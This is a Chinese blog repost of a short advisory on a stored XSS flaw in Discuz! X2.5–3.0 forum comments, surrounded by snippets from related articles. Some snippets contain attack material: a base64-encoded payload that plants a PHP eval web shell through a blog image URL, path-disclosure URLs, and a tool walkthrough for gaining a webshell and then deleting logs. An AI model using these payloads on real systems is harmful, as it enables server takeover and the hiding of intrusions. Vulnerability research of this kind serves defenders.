Discuz! x 2.5-3.0 beta 存储型跨站漏洞

最新推荐文章于 2022-05-10 15:59:10 发布
最新推荐文章于 2022-05-10 15:59:10 发布
阅读量91 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/security4399/p/3334110.html
版权
漏洞版本:
Discuz x 2.5 - 3.0
漏洞描述:
Discuz! 已拥有11年以上的应用历史和200多万网站用户案例

是全球成熟度最高、覆盖率最大的论坛软件系统之一,淘帖处发表评论,直接插入XSS CODE。可触发XSS漏洞
<* 参考
http://loudong.360.cn/vul/info/id/255
*>
安全建议:
厂商补丁:

Discuz!
------
下载官方最新程序

转载于:https://www.cnblogs.com/security4399/p/3334110.html

weixin_30800807
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]
oceanark的博客
07-13 2656
----------- 首先膜拜大牛的共享精神,我淫比较懒试了几个都没成功就不弄了,但有人说成功了,不知道是PR问题还是补丁了   正文:前面省略一万+字。。。。 利用方法 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),
discuz discuz_admincp.php 讲解,Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)
weixin_39740419的博客
03-19 675
0x00 漏洞简述漏洞信息8月27号有人在GitHub上公布了有关Discuz 1.5-2.5版本中后台数据库备份功能存在的命令执行漏洞的细节。漏洞影响版本Discuz! 1.5-2.50x01 漏洞复现官方论坛下载相应版本就好。0x02 漏洞分析需要注意的是这个漏洞其实是需要登录后台的,并且能有数据库备份权限,所以比较鸡肋。我这边是用Discuz! 2.5完成漏洞复现的,并用此进行漏洞分析的。漏...
Discuz2.5-3.4任意文件删除漏洞分析
老北京砸酱锤的博客
06-22 597
Discuz!X ≤3.4 任意文件删除漏洞 Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。 2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。 修复建议 升级到最新版本的 Discuz! 实验环境 操作机:centos7 目标地址:192.168.0.105 Discuz版本:3.1 实验步骤 步骤1:了解原理 该漏洞于2014年6.
DZ(discuz) x2.5 爆路径漏洞
收集盒 Book box
11-20 2617
/* just for search DZ x2.5 爆路径 绝对路径 dzx2.5爆路径 dz2.5爆路径 dz x.25 Dz x.25 DZ 2.5 */ 白肚 & 股沟 没找到dzx2.5的爆路径的漏洞 遂拿自己写的那个白盒测试挖洞辅助工具 果断秒杀之 发出来共享之 爆路径文件如下: /uc_server/control/admin/db.php /source/plug
DZ x2.5 爆路径漏洞
fengling132的专栏
08-23 833
测试exp:    http://localhost/uc_server/control/admin/db.php    http://localhost/source/plugin/myrepeats/table/table_myrepeats.php    http://localhost/install/include/install_lang.php
Discuz! -tools工具 (适用x2.5 x3.0 x3.1 x3.2 x3.4 )删除未使用图片附件等功能
02-19
论坛系统设计的强大辅助工具,尤其适用于x2.5、x3.0、x3.1、x3.2、x3.4等不同版本。这款工具被广大论坛管理员亲切地称为“dz的急救箱”,因为它能够执行一系列对论坛进行维护和优化的重要操作。 首先,我们来了解...
Discuz! X2.5 愤怒的小鸟插件V1.0.rar
07-14
X2.5 愤怒的小鸟插件V1.0》是一款专为Discuz! X2.5论坛系统设计的趣味插件,同时也兼容Discuz! X1.5、X2版本。这款插件的独特之处在于它并未对论坛的系统文件进行任何修改,而是通过外部实现方式,确保了用户在安装...
Discuz-X2.5-SC-UTF8
最新发布
09-24
Discuz! X2.5 SC UTF8:社区论坛构建详解》 Discuz! X2.5 SC UTF8是一款基于PHP和MySQL的开源社区论坛软件,由Comsenz公司开发,广泛应用于搭建中文网络社区。"SC"代表简体中文(Simplified Chinese),而"UTF8...
愤怒的小鸟 Discuz! X2.5 插件源代码
03-18
X2.5 插件源代码"是一款专为Discuz! X2.5论坛系统设计的扩展程序,旨在为用户提供趣味性的互动体验,以"愤怒的小鸟"这一经典游戏为主题。该插件不仅兼容X1.5、X2版本,还与X2.5版本完美融合,确保在不同版本的...
Discuz! x2.5深黑经典模板
12-01
x2.5深黑经典模板" 涉及的主要知识点是Discuz! X2.5论坛系统以及其配套的主题模板设计。Discuz! 是一款非常流行的开源社区建软件,主要功能是帮助用户快速搭建属于自己的论坛网。X2.5是Discuz! 的一个特定版本...
政政Discuz!NT 2.5.0 漏洞利用工具 1
02-11
软件名:政政Discuz!NT 2.5.0 漏洞利用工具 1.0 程序帮助: 1、先检测该论坛是否存在此漏洞 2、注册一个普通的帐号,提权成为管理员 3、更新ASPX为可上传,主要是为了上传ASPX木马的 4、去发表一个帖子,把你的ASPX木马上传上去。 5、去后台找附件的绝对路径,登陆你的ASPX木马 6、删除前台自己发的帖子,保留附件 7、更新ASPX不可上传,取后门 8、删除自己的相关日志 9、取消自己的管理员身份 10、完毕,成功拿到一台webshell ASPX木马的一般权限都很大,很好提权,拿到一台webshell也意味着你拿了一台服务器哦~!
Discuz! X2.5 远程代码执行漏洞及EXP
weixin_30363817的博客
08-03 312
利用方法: 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论坛根目录下生成demo.php,一句发密码C 转载于:https...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
Discuz X2.5 修复漏洞后引发首页DIY数据为空失效
shadou0109的专栏
04-18 1507
今天更新了Discuz! X2.5发布的两个漏洞之后,引发了门户首页DIY模块的失效。 找遍了很多网页,也试过了很多所有找的办法。 http://x.discuz.net/thread-2355350-1-1.html 这篇文章基本说的算靠谱,但是作者并没有写出具体的解决方案。不知道为啥,没看到附件。   我自己瞎捣鼓,倒是算歪打正着吧。首先有以前的模块,将data/diy文件夹给覆盖了,
关于Discuz! X系列远程代码执行漏洞
weixin_34306676的博客
11-16 511
一、漏洞起源 突然有同事反馈,无法注册   看到这里不了解的同行估计一年懵逼,这里也是常用的漏洞攻击,可以肯定的是  badwords.php文件被修改了 ,可以查看这个文件内容 &lt;?php $_CACHE['badwords'] = array ( 'findpattern' =&gt; array ( 'balabala' =&gt; '/.*/...
dz 论坛x2.5爆路径 利用
l460602540的专栏
09-12 1566
http://blog.sina.com.cn/s/blog_4ab77dfb01015xro.html 注:转载请注明出处 Lind0ws 's Blog    http://localhost/uc_server/control/admin/db.php    http://localhost/source/plugin/myrepeats/table/table_myr
Discuz! X2 SQL注射漏洞 0day
fengling132的专栏
05-02 1033
@Discuz! X2 SQL注射漏洞 0day  文件:source\module\forum\forum_attachment.php   if(!defined('IN_DISCUZ')) { exit('Access Denied'); } define('NOROBOT', TRUE); @list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t
漏洞复现-DiscuzX 系列全版本后台SQL注入漏洞
qq_59350385的博客
05-10 1524
目录 环境搭建 (1)源码下载: 漏洞检测 报错注入 写文件 漏洞分析 环境搭建 (1)源码下载: https://search.gitee.com/?skin=rec&type=repository&q=discuz git clonehttp://htts://gite.com/ComsenzDiscuzX.git 放置于web根目录,访问即可进入安装页面 (2)也可搭建vulhub靶场,启动discuz环境 漏洞检测 http://.....
DiscuzX2注入漏洞及XSS漏洞的利用
harryxlb的专栏
11-17 4956
注射漏洞详细说明: 文件:source\module\forum\forum_attachment.php if(!defined('IN_DISCUZ')) { exit('Access Denied'); } define('NOROBOT', TRUE); @list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'],
discuz_x2.5_sc_utf8.zip
07-30
discuz_x2.5_sc_utf8.zip 是一种网建设工具的压缩文件,用于搭建或更新Discuz X2.5版本网Discuz X是一款知名的论坛软件,被广泛应用于社区网的建设。 这个压缩文件的名称中,"discuz"指的是软件的名字,"x...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值